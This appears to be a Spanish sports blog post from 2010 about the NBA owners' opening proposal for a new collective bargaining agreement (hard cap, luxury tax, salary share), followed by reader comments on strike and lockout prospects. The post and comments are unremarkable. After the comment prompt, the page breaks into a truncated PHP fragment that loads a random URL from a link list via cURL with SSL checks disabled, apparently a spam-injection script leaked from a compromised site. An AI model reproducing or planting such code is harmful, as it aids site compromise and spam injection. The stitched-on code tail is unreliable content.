Convenio Colectivo de la NBA: ¿Huelga en el horizonte?

08 de February de 2010 por Jose_Dantley

Según informa Ken Berger en CBS Sports, la NBA ha remitido a la Asociación de Jugadores una primera oferta de renovación del convenio colectivo que expira al final de la temporada 2010-2011, es decir, en poco más de un año. Como era de esperar, los propietarios  intentarán desesperadamente recortar gastos, ya que la otra pata de la ecuación, los ingresos, están seriamente afectados por la crisis económica, hasta tal punto que la mayoría de las franquicias NBA se encuentran en pérdidas.

La oferta de los propietarios sigue los principios del manual de una buena negociación: comenzar por una primera oferta agresiva pero creíble. Según Berger citando personas muy cercanas a los propietarios –no es difícil imaginar que el juego de las filtraciones no ha hecho más que empezar- las franquicias han planteado eliminar el impuesto de lujo, luxury tax, y sustituirlo con un tope salarial duro, hard cap.

Hagamos un brevísimo resumen del convenio que ampliaremos en próximos artículos.

Actualmente, la NBA tiene un sistema salarial basado en un tope salarial blando –soft cap-. Su alternativa, hard cap, es más fácil de entender. En ella, el total de salarios pagados por un equipo no puede pasar una determinada cifra. En la NFL, los salarios anuales no pueden superar los 128 millones de dólares. La NFL también dispone de un salary hard floor, es decir, de un límite inferior de salarios que actualmente es de 112 millones de dólares. Estos límites se revisan mediante fórmulas complejas que dependen entre otros criterios de los ingresos obtenidos por los equipos en su conjunto. Las excepciones son mínimas y su impacto es menor. Por tanto, el gasto salarial de la NFL está constreñido entre unas bandas muy estrechas. Dicha circunstancia tiene varias ventajas para los propietarios:

– Su gasto salarial es muy predecible
– La igualdad entre equipos es notablemente superior a ligas con límites blandos
– El valor financiero de las franquicias es superior al disminuir su riesgo

La NBA, por el contrario, tiene  un soft cap. Los equipos se enfrentan a un límite salarial de 58.7 millones de dólares. No obstante, existen variadas excepciones que permiten a las franquicias estar por encima de dicho límite, como la Bird exception o la Mid-Level exception. La casuística es muy amplia, pero lo dejaremos para próximos artículos. Para evitar que el salario se dispare, el convenio prevé otras normas que intentan evitarlo pero nunca tan efectivas como sería un tope salarial duro. Además de que existe un salario individual máximo, los límites salariales se establecen en función de un porcentaje de los ingresos de las franquicias, en concreto el 57%. Por otro lado, para desincentivar que las franquicias poderosas financieramente tengan nóminas muy elevadas, se establece un impuesto de lujo que está situado en 70 millones de dólares. Por cada millón que una franquicia esté por encima de dicha cifra, deberán pagar una multa de un millón de dólares que se reparte entre los equipos por debajo de dicho límite.

La propuesta de los propietarios es un órdago en toda regla. Por un lado, proponen una disminución del porcentaje que representan los salarios sobre los ingresos. En concreto, plantean disminuir del 57 a una cifra inferior al 50%. Por otro lado, proponen un tope salarial duro. Aún no hay detalles, pero entendemos que la propuesta puede haber sido un sistema con más características de tope salarial duro, pero manteniendo ciertas excepciones aunque mucho más limitadas.

Derek Fisher, Presidente de la Asociación, ya manifestó días atrás que no aceptarían una rebaja salarial significativa. Es normal que los jugadores estén con la mosca detrás de la oreja. Si nos fijamos en la NFL –con todas sus diferencias, como por ejemplo, el tamaño de las plantillas- un tope duro significa una disminución notable de los salarios de los peores jugadores y, muy especialmente, de los veteranos. El efecto en las estrellas dependería de si los límites individuales se mantienen y de cómo se mantienen.

Ampliaremos en próximos días las posibles consecuencias. En concreto, durante el próximo All-Star se mantendrá la primera reunión formal entre jugadores y propietarios. No nos extrañaría que la palabra huelga comenzara a aparecer con asiduidad. La amenaza de los jugadores tiene una buena base en la huelga mantenida en la famosa liga de los 50 partidos de 1999. La amenaza de la crisis también es descorazonadora.

Comenta

8 comentarios a esta entrada

  1. Vader dice:
    #1

    Precisamente debido a la crisis no creo que esta vez se llegue a la huelga. Una huelga significa un daño muy grande a las cuentas de resultados de las franquicias y tambien de los jugadores…

    Creo que es más probable que se firme un nuevo convenio colectivo con pocos años de duración a la espera de como se desarrolle la económia del país y de la liga en los próximos años. Si la cosa sigue mal el próximo convenio si que seria definitivamente a la baja (o con un hard cap) y si los números vuelven a salir se volveria a firmar un convenio similar al que se firme el año que viene.

    Igual me equivoco pero ahora mismo creo que el coste de una huelga, económico para las franquicias y económico y de imagen para los jugadores NBA hace muy difícil pensar en esta posibilidad.

    Habra que esperar acontecimientos pero no descarteis un final feliz más rápido de lo previsto y con un mensaje colectivo de “en la NBA sabemos apretarnos el cinturón cuando la nación lo requiere…”

    Saludos

      Citar

  2. sergio dice:
    #2

    Jose_Dantley sos groso!!!

    Aunque estaba al tanto de los problemas relacionados con el convenio laboral no sabia que podian incluir reglas salariales al estilo NFL. Realmente esas modificaciones podrian transformar la liga de una forma un tanto brusca… Si ahora, por ejemplo, los sueldos maximos a percibir por un jugador se incrementan en funcion de su experiencia… en un futuro seria impensable. Desde luego el abaratamiento de costes de los equipos y las estrategias de mercado que puedan generar algunos eventos de la NBA (creacion de nuevos torneos, mayores salidas al extranjero, ….) podrian ayudar del mismo modo que lo hacen esas nuevas leyes que quieren instaurar. No olvidemos que este deporte es cosa de aficionados y deportistas. Aunque ellos no sean los que deberian salir perjudicados de todo esto quizas si deberian plantearse su nivel economico respecto al resto de los mortales y aplicarse VOLUNTARIAMENTE una bajada de sueldos pactada como han de hacerlo los equipos, el precio de las entradas, las tasas que cobra la NBA,….
    Seguiremos atentamente el desarrollo Jose_Dantley (ya no se si Dantley y Jose_Dantley sois el mismo) pero no creo que las reuniones se traduzcan en cambios tan importantes… la NBA siempre ha querido preservar su independencia y originalidad en todos los aspectos… si adoptase ideas seria a su manera.

      Citar

  3. Love DEnise dice:
    #3

    Muy buena info Dantley. Personalmente, creo que se llegara a un acuerdo, puesto que en estos momentos, ni a NBA, jugadores, patrocinadores, etc…, le interese un parón.

      Citar

  4. NBA LAKERS BLOG dice:
    #4

    Este lío se venía venir. Ojalá termine todo bien, pero coincido con el comentario de Vader. Pase lo que pase, que no haya huelga de vuelta, por Dios!

    Te invito a nuestro blog de los Lakers, que vuelve a funcionar en normalidad como siempre.

    Un fuerte abrazo!

    -NM-

      Citar

  5. Txusma dice:
    #5

    Los contratos que se firmen este verano mantienen las normas del convenio antiguo hasta su extinción? Podría ser que si se firma un convenio por pocos años (pongamos 5) nos encontramos q en una temporada hay hasta 3 convenios diferentes activos?

    Por cierto leo por ahí que otra de las propuestas q sobrevuelan las negociaciones es que ningún contrato pueda superar los 3 años de duración. De esta manera las franquicias se protegen de fichajes y renovaciones erróneas.

      Citar

  6. Dantley2 dice:
    #6

    Sergio, soy el mismo, es el problema de tener tantas password y que se te olviden ¡¡¡

    El problema ahora es que van saliendo rumores a cuentagotas. Algunos de ellos son los siguientes:

    – Intentarían que todos los contratos firmados antes del nuevo convenio (que entraría en vigor el 1/7/2011) se adaptaran al nuevo convenio. Eso entra dentro de lo legalmente muy discutible. Se negarían los grandes cracks y creo que en un juicio tendrían las de ganar

    – Efectivamente, Txus, los propietarios han propuesto disminuir el contrato máximo a 5 años, de los cuáles máximo 3 (incluso 2 para contratos de 4) estarían garantizados. Esta medida buscaría reducir el número de jugadores que sólo juegan en su año de contrato.

    Ahora mismo es muy difícil pronosticar si habrá o no huelga. En una negociación de alto nivel (alguna he vivido en segunda fila y son divertidísimas) siempre se lanzan algunas cuestiones para intimidar a tu oponente con la que se cuenta que se puede retirar en un momento dado (tipo la de retroactividad del convenio). El caso es que hay mucho que perder por las dos partes.

    Entra dentro de lo posible que no acabe siendo una huelga sino un lockout, que es una huelga, pero al revés, la hacen los propietarios. En España es muy inusual, en USA sí se ha dado, incluso en grandes deportes profesionales.

      Citar

  7. sergio dice:
    #7

    Pues lo de la reduccion de la duracion maxima de los contratos me pareceria todo un acierto. Se podrian extender sin problema para los jugadores estrella como hasta ahora, con derechos de ampliacion para las franquicias. Habria mas renovacion en los equipos en construccion y menos “flojos” en el panorama (Curry, Dampier, Jermaine O’neal, Kirilenko, Kenyon Martin, Stojakovic, Larry Hughes,….)

      Citar

  8. HisRoyalAirness dice:
    #8

    El juego de contratos que se traen los jugadores es una de las cosas que desvirtúan toda esta historia; el rollo tipo “Jerry McGuire” de intentar hacer una temporada cojonuda para poder firmar un gran contrato y luego sentarse a descansar debería ser evitable; que Kirilenko o Rashard Lewis esten en el top 10 de mejor pagados es absolutamente vomitivo y todo por firmar contratos multianuales escandalosos (culpa también de los propietarios, que se prestan a ese juego). Que haya una duración máxima de 3 años es lo lógico porque, como en cualquier trabajo, si no rindes a tu nivel te vas a la puta calle (salvo si eres funcionario en España).

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>